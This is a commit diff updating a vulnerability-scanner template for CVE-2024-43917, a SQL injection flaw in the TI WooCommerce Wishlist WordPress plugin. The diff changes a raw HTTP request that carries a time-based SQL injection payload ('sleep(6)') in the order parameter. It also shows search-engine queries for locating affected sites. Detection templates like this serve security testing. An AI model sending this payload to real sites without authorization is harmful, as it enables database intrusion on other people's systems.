Update CVE-2024-43917.yaml

http/cves/2024/CVE-2024-43917.yaml

@@ -9,6 +9,7 @@ info:
   reference:
     - https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/
     - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve
+    - https://nvd.nist.gov/vuln/detail/CVE-2024-43917
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -25,7 +26,7 @@ info:
     framework: wordpress
     fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/"
     publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/"
-  tags: cve,cve2024,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli,intrusive
+  tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli
 
 flow: http(1) && http(2) && http(3) && http(4)
 
@@ -117,7 +118,8 @@ http:
 
   - raw:
       - |
-        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(5)))a)--+- HTTP/1.1
+        @timeout: 20s
+        GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1
         Host: {{Hostname}}
         X-WP-Nonce: {{nonce}}
 
@@ -125,7 +127,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - "duration>=5"
+          - "duration>=6"
           - "contains(content_type, 'application/json')"
           - "contains(body, 'product_id')"
         condition: and